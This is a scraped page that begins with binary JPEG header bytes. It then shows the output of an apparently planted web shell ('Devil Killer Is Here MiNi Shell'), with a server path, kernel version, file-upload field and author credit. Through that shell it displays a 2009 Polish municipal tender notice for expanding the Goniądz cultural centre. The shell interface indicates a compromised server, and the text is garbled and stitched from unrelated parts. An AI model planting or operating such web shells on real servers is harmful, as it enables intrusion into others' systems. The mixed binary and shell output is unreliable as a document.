JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090707/106255-N-2009.html

<p class="kh_header"><b>Goniądz: Realizacja projektu o nazwie :
Rozbudowa Ośrodka Kultury  z adaptacją  na   Ośrodek Integracji Europejskiej i Promocji Podlasia w Goniądzu
współfinansowanego ze środków UE - Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007-2013 Osi Priorytetowej III. Rozwój turystyki i kultury Działania 3.1 Rozwój atrakcyjności turystycznej regionu.</b><br>
<b>Numer ogłoszenia: 106255 - 2009; data zamieszczenia: 07.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Goniądzu , Plac 11 Listopada 38, 19-110 Goniądz, woj. podlaskie, tel. 085 7380043, faks 085 7380307.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja projektu o nazwie :
Rozbudowa Ośrodka Kultury  z adaptacją  na   Ośrodek Integracji Europejskiej i Promocji Podlasia w Goniądzu
współfinansowanego ze środków UE - Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007-2013 Osi Priorytetowej III. Rozwój turystyki i kultury Działania 3.1 Rozwój atrakcyjności turystycznej regionu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja projektu o nazwie :
Rozbudowa Ośrodka Kultury  z adaptacją  na   Ośrodek Integracji Europejskiej i Promocji Podlasia w Goniądzu, ul. Stary Rynek 23
współfinansowanego ze środków UE - Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007-2013 Osi Priorytetowej III. Rozwój turystyki i kultury Działania 3.1 Rozwój atrakcyjności turystycznej regionu.

Powierzchnia istniejącego budynku wynosi 861,6 m2, powierzchnia zabudowy całkowitej 1047,20 m2.Kubatura budynku wynosi 6 207 m3, powierzchni użytkowej 1 290,50 m2.
Rozbudowa oparta jest na istniejących fundamentach, które należy wzmocnić rdzeniami żelbetowymi i wykonać izolację pionową. Ściany konstrukcyjne wew. I zewn. Z bloczków lub z cegły silikatowej. Stropy cegła żerańska gr. 24 cm. Dach nad salą widowiskową kratownica stalowa, nad resztą konstrukcja drewniana. Krycie blachą powlekaną, dachówko-podobną. Stolarka PCV-okienna, aluminiowa drzwi zewnętrzne.

2.  Szczegółowy opis zamówienia przedstawiono w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót oraz przedmiarach stanowiących załączniki do niniejszej SIWZ.
3. Wykonawcy udzielą gwarancji zgodnie z projektem Karty Gwarancyjnej (według zał. nr 5).
4. Wykonawcy, w celu zapoznania się ze specyfiką warunków lokalizacyjno - terenowych, powinni dokonać wizji lokalnej przed złożeniem oferty.
5. Wykonawcy są zobowiązani do dostarczenia dokumentacji powykonawczej z naniesionymi nieistotnymi odstępstwami od zatwierdzonego projektu budowlanego.
6. Nazwa i kod zgodnie z CPV: 45 20 00 00-9 - budownictwo.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium o wartości 100 000,00 PLN.
2. Wadium może być wniesione w następujących formach:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.  z 2007 nr 42, póz. 275 z późniejszymi zmianami).
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem  na rachunek bankowy BS MOŃKI O/GONIĄDZ Nr: 37808500050130009720000050
4.  Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w chwili otwarcia ofert znajduje się na koncie Zamawiającego.
5.  Dokumenty dotyczące wadium wniesionego w innej formie niż pieniądzu (zgodne z zapisami pkt. VIII ppkt 2), należy w oryginale dostarczyć do siedziby Zamawiającego odrębnie lub łącznie z ofertą do chwili otwarcia ofert. Potwierdzona kopia musi być dołączona do oferty.
6. Wykonawca, który nie wniósł wadium zostanie wykluczony z postępowania.
7. Wykonawca, którego oferta została wybrana traci wadium w okolicznościach przewidzianych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
8.Zamawiający orzeknie przepadek wadium jeżeli na wezwanie Zamawiającego Wykonawca nie uzupełni dokumentów .
9. Dyspozycję wykonawców w zakresie zwrotu wniesionych w pieniądzu wadiów, Zamawiający przekaże do banku niezwłocznie po zawarciu umowy z wykonawcą, którego ofertę wybrano lub po unieważnieniu przetargu, i nie później niż następnego dnia po upływie terminu związania ofertą.
10. Jeżeli przed upływem terminu składania ofert, wykonawca wycofał się z przetargu, Zamawiający dokona zwrotu wadium w terminie 3 dni od daty pisemnego złożenia wniosku o zwrot, jak również na pisemny wniosek wykonawcy, którego oferta została odrzucona.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.   Spełniają warunki z art. 22 ust. l pkt. 1-3 Ustawy z dnia 19 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2007r. Nr 223 póz. 1655 ze zmianami).
2.   Nie podlegają wykluczeniu na podstawie art. 24 ust. l i 2 Ustawy z   dnia 19 stycznia   2004r. Prawo zamówień publicznych (Dz. U. z 2007r. Nr 223 póz. 1655 ze zmianami).
3.   Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy nakładają obowiązek posiadania takich uprawnień.
4.   Posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego osób zdolnych do wykonania zamówienia
a) Zrealizowali w ostatnich 5 latach jako Generalni Wykonawcy (rozpoczęte po 01.01.2004 i zakończone do 31.12.2008), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 budynków: użyteczności publicznej lub budynków zamieszkania zbiorowego, w rozumieniu zapisu §3 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002r. nr 75 póz. 690 wraz ze zmianami) o wartości netto co najmniej 2.000.000,00 zł każdy. Realizacja każdego obiektu musi być potwierdzona pozytywnymi opiniami Zamawiających w rozumieniu ustawy Prawo zamówień publicznych. Za Zamawiających nie uznaje się generalnych wykonawców.
b)  Zrealizowali w ciągu ostatnich 5 lat ( rozpoczęte po 01.01.2004 i zakończone do 31.12.2008) co najmniej 1 zamówienie polegające na wyposażeniu wielofunkcyjnych sal widowiskowo- konferencyjnych o charakterze sceniczno widowiskowym o wartości netto każdej nie mniej niż 500 tys. zł , w technologie zawierające :
- wykonanie instalacji systemów audiowizualnych dla celów kongresowych i scenografii ze szczególnym uwzględnieniem systemów projekcji wielkoekranowych,
- wykonanie instalacji  systemów nagłośnienia do celów muzycznych kongresowych oraz projekcji wielkoekranowych,
- wykonanie elementów systemów technologii sceny w tym mechaniki scenicznej typu sztankiety, mosty oświetlne, wyciągarki, kulisy kurtyny elektryczne , itp. oraz systemów oświetlenia ogólnego i reflektorowego sterowanego w systemie DMX
- wykonanie instalacji sterujących technologią Sali (oświetlenie , multimedia) w standardzie automatyki budynku np. LonWorks, EIB, itp.,
- wykonanie dedykowanych dla sal koncertowych, widowiskowych i kongresowych systemów sterowania technologicznego aparaturą medialną typu Preston, AMX, CUE, itp., ze szczególnym uwzględnieniem ich integracji z systemem sterowania DMX- standardu techniki scenicznej.
c) przedstawią referencje dokumentujące  wykonanie obiektów z zastosowaniem technologii wymienianych w kryteriach technicznych (ppkt. b) 
d) dysponują osobami do kierowania realizacją zamówienia, posiadającymi udokumentowane uprawnienia i kwalifikacje, niezbędne do prowadzenia prac będących przedmiotem zamówienia ( w tym posiadane uprawnienia i aktualny wpis do Izby Inżynierów Budownictwa) obejmujących pełen zakres branżowy (w zakresie robót ogólnobudowlanych, sanitarnych, elektrycznych, drogowych) wymagane przepisami ustawy Prawo Budowlane (Dz.U. z 2000r. nr 106 póz. 1126 z późn. zmianami).
- dysponują osobami posiadającymi uprawnienia i certyfikaty do realizacji specjalistycznych instalacji będących przedmiotem zamówienia (pkt b). Oferent musi posiadać certyfikaty uprawniające go do instalacji, uruchamiania i serwisu proponowanych urządzeń.
 5. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
a) posiadają potencjał finansowy pozwalający na zaangażowanie środków własnych lub zdolność kredytową nie mniejszą niż 500 tys. zł. ,
b) udzielą co najmniej 5-letniej gwarancji na wszystkie prace budowlano - instalacyjne w zakresie AV oraz na dostarczone urządzenia,
c) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę nie mniejszą jak 500 tys. zł.
Ocena spełnienia warunków wymaganych od wykonawców dokonana zostanie w systemie  /spełnia - nie spełnia/, z zachowaniem art. 26 ustawy Zamówień Publicznych.
Niespełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące oryginalne dokumenty, ich odpisy lub kserokopie poświadczone za zgodność z oryginałem przez osoby uprawnione do działania w imieniu wykonawcy. Na potwierdzanym dokumencie, wraz z podpisem osoby uprawnionej, musi znaleźć się zapis /za zgodność z oryginałem.
1.   Oferta.
1.1.Wypełniony formularz Oferta (wg zał. formularza - zał. nr 1).
1.2.Formularz cenowy (wg zał. formularza - zał. nr 7) sporządzony na podstawie kosztorysu szczegółowego wykonanego zgodnie z dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót oraz przedmiarem robót, stanowiącymi załączniki do SIWZ (spis wg załącznika nr 6). Kolejność pozycji kosztorysowych powinna być zgodna z ich chronologiczną numeracją zapisaną w przedmiarach, a każda pozycja winna być zakończona ceną jednostkową wraz z przyjętymi do kalkulacji narzutami. Pozycje kosztorysowe dla których brak jest przedmiarów powinny się znaleźć na końcu odpowiedniego elementu kosztorysu ofertowego.
1.3. Wykaz stawek i narzutów zastosowanych do wyceny oferty (wg zał. formularza - zał. Nr 4).
2.    Dowód wniesienia (ustanowienia) wadium.
3.    Dokumenty i oświadczenia potwierdzające spełnienie wymaganych warunków:
3.1. Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.2. Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 st. l pkt 1-3 ustawy z dnia 29 stycznia 2004r. Prawo Zamówień publicznych i o niepodleganiu wykluczeniu z postępowania zgodnie z art. 24 ust. l i 2.
3.3. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3.4. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. l pkt. 9 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.5. Aktualną informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. l pkt. 4-8 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.6. Wykaz osób odpowiedzialnych za kierowanie realizacją zamówienia wraz z udokumentowaniem ich uprawnień i kwalifikacji, niezbędnych do prowadzenia prac będących przedmiotem zamówienia (w tym posiadane uprawnienia i aktualny wpis do Izby Inżynierów Budownictwa) a także zakres wykonywanych przez nich czynności obejmujący pełen zakres branżowy (w zakresie robót ogólnobudowlanych, sanitarnych, elektrycznych) - wg zał. formularza - zał. nr 3.
3.7. Sprawozdanie finansowe za okres nie dłuższy niż ostatnie trzy lata obrotowe wraz z opinią biegłego rewidenta o badanym sprawozdaniu, jeżeli podlegało badaniu; w przypadku wykonawcy nie zobowiązanego do składania sprawozdań finansowych - innych dokumentów określających obroty oraz zobowiązania i należności. W przypadku krótszego okresu działalności - odpowiednie dokumenty za okres prowadzenia tej działalności,
oraz:
informację z banku/spółdzielczej kasy oszczędnościowo-kredytowej, w którym/ej wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków lub zdolności kredytowej wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3.8. Polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. W przypadku polisy z terminem związania krótszym niż czas trwania kontraktu wymagane jest zobowiązanie w formie oświadczenia o przedłużeniu polisy na czas wymagany.
3.9.  Wykaz budynków użyteczności publicznej i zamieszkania zbiorowego, o których mowa w pkt. III SIWZ, zrealizowanych przez wykonawcę w okresie ostatnich 5 lat (rozpoczętych po 01.01.2004 i zakończonych do 31.12.2008), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości netto oraz daty ( dzień, miesiąc, rok rozpoczęcia i zakończenia) i miejsca ich wykonania oraz załączeniem dokumentów potwierdzających (opinie, referencje), że roboty te zostały należycie wykonane - wg zał. formularza - zał. nr 2.
3.10.Wykaz podmiotów, które będą uczestniczyć w wykonywaniu zamówienia i zakres prac przewidywanych im do wykonania (nazwa i adres podwykonawcy, zakres prac przewidzianych do powierzenia w ramach zamówienia) - jeżeli dotyczy - zgodnie z art. 36 ust. 4 Ustawy Prawo Zamówień Publicznych.
4.   W   przypadku   podmiotów  występujących  wspólnie  dokument  ustanawiający  pełnomocnika  do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
5.1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, mają zastosowanie przepisy § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 87, poz. 605) oraz rozporządzenia zmieniającego rozporządzenie z dnia 16 października 2008r. (Dz.U. Nr 188, poz. 1155), tj. zamiast dokumentów o których mowa w pkt. 3 :
1) ppkt. 3.1, 3.3, 3.4  - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że :
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2) ppkt. 3.5 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy.
2.Dokumenty, o których mowa w ust. 1 pkt. 1 lit. a i c oraz pkt. 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w ust. 1 pkt. 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 2 stosuje się odpowiednio.
 Niespełnienie wymagań określonych w pkt. 1 do 5 niniejszej SIWZ, brak któregokolwiek z wyżej wymienionych dokumentów, złożenie dokumentu w niewłaściwej formie, nieuzupełnienie dokumentów lub niezłożenie wyjaśnień w terminach wyznaczonych przez Zamawiającego, skutkować będzie wykluczeniem wykonawcy lub odrzuceniem oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.um.goniadz.wrotapodlasia.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Goniądzu
Plac 11 Listopada 38
19-110 Goniądz
pok. nr 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2009 godzina 11:00, miejsce: Urząd Miejski w Goniądzu
Plac 11 Listopada 38
19-110 Goniądz
pok. nr 5 (Sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com